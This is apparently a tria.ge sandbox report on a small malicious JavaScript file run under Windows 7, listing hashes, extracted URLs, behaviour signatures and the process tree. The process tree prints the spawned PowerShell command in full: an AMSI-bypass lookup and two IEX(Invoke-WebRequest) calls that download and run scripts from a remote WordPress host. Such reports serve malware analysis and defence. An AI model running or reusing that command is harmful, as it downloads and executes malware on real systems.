Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
03/12/2024, 11:25
Static task
static1
Behavioral task
behavioral1
Sample
3aee16fd175032ee9188351aec3d27b73daf2692366cb6df91259b3b9c64fd08.js
Resource
win7-20241010-en
General
-
Target
3aee16fd175032ee9188351aec3d27b73daf2692366cb6df91259b3b9c64fd08.js
-
Size
1KB
-
MD5
153635d66bd01a944dcd4661cec41896
-
SHA1
47fe0783bc7b6db0c1456bf86cda61bdd31b5ca8
-
SHA256
3aee16fd175032ee9188351aec3d27b73daf2692366cb6df91259b3b9c64fd08
-
SHA512
28a4c1f24614609c2406fa32b5a4dc0531851abfe72d79ce71d477b4da7c87f0f399346dfba453591e3063dc6af4921b927ad7c24ffb619dec44e4a979f88ab5
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Signatures
-
pid Process 2492 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2492 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2540 wrote to memory of 2492 2540 wscript.exe 32 PID 2540 wrote to memory of 2492 2540 wscript.exe 32 PID 2540 wrote to memory of 2492 2540 wscript.exe 32 PID 2540 wrote to memory of 2492 2540 wscript.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3aee16fd175032ee9188351aec3d27b73daf2692366cb6df91259b3b9c64fd08.js1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z87N0NGGB4F'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-